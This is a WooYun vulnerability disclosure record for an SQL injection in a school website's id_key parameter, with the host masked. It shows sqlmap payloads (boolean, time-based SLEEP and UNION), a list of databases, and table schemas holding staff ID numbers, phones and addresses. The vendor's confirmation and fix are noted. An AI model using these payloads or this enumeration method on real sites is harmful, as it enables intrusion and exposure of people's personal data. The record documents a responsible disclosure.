乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-07: 细节已通知厂商并且等待厂商处理中 2015-12-10: 厂商已经确认,细节仅向厂商公开 2015-12-20: 细节向核心白帽子及相关领域专家公开 2015-12-30: 细节向普通白帽子公开 2016-01-09: 细节向实习白帽子公开 2016-01-12: 厂商已经修复漏洞并主动公开,细节向公众公开
注入点(id_key):http://**.**.**.**/directory_user_en.php?id_key=7&eng=T
sqlmap identified the following injection point(s) with a total of 69 HTTP(s) requests:---Parameter: id_key (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id_key=1 AND 7686=7686&eng=T Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: id_key=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6a6b71,0x556a4e4b437368726857,0x7162786b71)-- &eng=T---web server operating system: Linux CentOS 6.5web application technology: PHP 5.5.21, Apache 2.2.15back-end DBMS: MySQL >= 5.0.0sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:---Parameter: id_key (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id_key=7 AND 1534=1534&eng=T Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id_key=7 AND SLEEP(5)&eng=T Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: id_key=7 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171767871,0x555273466d74766e6a44,0x7162767171)-- &eng=T---web server operating system: Linux CentOS 6.5web application technology: PHP 5.5.21, Apache 2.2.15back-end DBMS: MySQL 5.0.12current database: 'teacher'current user is DBA: Falseavailable databases [44]:[*] #mysql50#lost+found[*] #mysql50#mysql.old[*] academia[*] acclab[*] admin_document[*] adminsys[*] applysys[*] asiopsclpl[*] auto_web[*] bspl[*] calendar[*] Computer_room[*] dayoffsys[*] document[*] emergercy[*] engineer[*] forums[*] goods[*] hpmachine[*] hssp[*] imaging[*] information_schema[*] intranet[*] jobfaq[*] lab[*] library[*] lowtemp[*] material[*] meal[*] meeting[*] mysql[*] nano_public_facility[*] nanofacility[*] nonlinear[*] nscsys[*] nscsystem[*] OpenXcience[*] performance_schema[*] physadmin[*] purchase[*] repair[*] student[*] teacher[*] wwwgroup
随便看看几个数据库吧
Database: teacher+-------------------+---------+| Table | Entries |+-------------------+---------+| modify_log | 5214 || basic_publication | 1366 || basic_experience | 353 || basic_interest | 229 || res_id | 185 || basic_school | 127 || basic | 110 || basic_other | 100 || basic_postdoc | 38 || basic_recenttalk | 23 |+-------------------+---------+
Database: student+--------------+---------+| Table | Entries |+--------------+---------+| homework | 5205 || answer | 2732 || phorum | 666 || login_log | 569 || name_list | 464 || work_list | 202 || question | 25 || webtree | 14 || time_setting | 2 || users | 1 |+--------------+---------+
这个库包含的信息比较多:
Database: physadmin+------------------------+---------+| Table | Entries |+------------------------+---------+| bulletin_file | 10546 || employ_record | 9789 || employ_record_20150629 | 9378 || employ_status | 9140 || person_require | 7158 || bulletin | 6631 || person_attach | 6531 || personnel_log | 6463 || company | 3894 || tenders_status | 2775 || demit_status | 2445 || personnel_record | 2438 || book_propose | 2155 || oa_occupation | 2152 || student_record | 1793 || visitor_others | 1546 || visitor_status | 1546 || visitor_record | 1545 || studentcard_tmp | 1332 || oa_school | 1200 || general_status | 1189 || personnel_visitor | 1131 || oa_person | 1088 || personnel_student | 1048 || rights | 749 || job | 637 || project_all | 628 || tenders | 627 || student_status | 563 || studentcard | 425 || general_tel | 393 || general_car | 264 || nation | 240 || new_personnel | 235 || personnel_record_log | 229 || tenders_file | 205 || subtask | 197 || users | 183 || job_table | 178 || car_status | 140 || personnel_a | 123 || group_teacher | 63 || position_table | 55 || pay_voucher | 54 || sys_table | 52 || task | 34 || pay_cash | 26 || book_back | 25 || secretballot | 22 || handicap | 16 || suppagent | 15 || aborigine | 14 || group_pro | 14 || bulletin_group | 13 || mainblock | 12 || pay_rank | 11 || handicap_level | 4 || state | 4 || aborigine_level | 3 || announce | 3 || company_type | 3 || maildepart_log | 3 || agent_table | 1 || person_delete | 1 |+------------------------+---------+
个人信息:
Table: personnel_record[38 columns]+-----------------+--------------+| Column | Type |+-----------------+--------------+| aborigine | varchar(10) || account | varchar(15) || acct_pos_ac | varchar(10) || acct_pos_no | varchar(10) || address | tinytext || addrnow | tinytext || arrdate | date || birthdate | date || cname | varchar(20) || doorcard | varchar(15) || email | varchar(120) || email2 | varchar(100) || ename | varchar(40) || flag | tinyint(1) || handicap | varchar(10) || handphone | varchar(12) || hometel | varchar(15) || hometown | varchar(10) || icno | varchar(20) || ictype | tinyint(1) || kindred | varchar(20) || kindredtel | varchar(15) || marriage | tinyint(1) || martialdatefrom | date || martialdateto | date || nationality | varchar(20) || offdate | date || passno | varchar(20) || personid | int(11) || picture | varchar(20) || pnotes | tinytext || research | tinyint(4) || research_type | tinyint(4) || sameaddr | tinyint(1) || servicecard | varchar(15) || sex | char(2) || zip | varchar(6) || zipnow | varchar(5) |+-----------------+--------------+
举例说明,电话、住址、身份证信息、email等好几千:
Table: employ_record[35 columns]+----------------+--------------------------+| Column | Type |+----------------+--------------------------+| position | varchar(4) || applydatefrom | date || applydatefrom2 | date || applydatefrom3 | date || applydateto | date || applydateto2 | date || applydateto3 | date || chief | varchar(20) || demitid | int(11) || employid | int(11) || insure | varchar(10) || lpdate | date || new_posi | varchar(100) || notes | tinytext || otherpj2 | tinytext || p_name | varchar(40) || pay_rank | varchar(50) || payfrom | varchar(20) || payoption | tinyint(1) || paytype | tinyint(1) || personid | int(11) || proj_q_id | varchar(10) || project_id | varchar(70) || project_name | tinytext || ps | varchar(20) || salary | int(6) unsigned zerofill || salary2 | int(6) unsigned zerofill || salary3 | int(6) unsigned zerofill || sm | varchar(100) || subtask | char(3) || suppagent | char(3) || task | char(3) || workpay | varchar(20) || worktype | tinyint(1) || yearno | char(3) |+----------------+--------------------------+
接近一万的数据就不dump了
危害等级:高
漏洞Rank:16
确认时间:2015-12-10 01:46
感謝通報
2016-01-12:已修復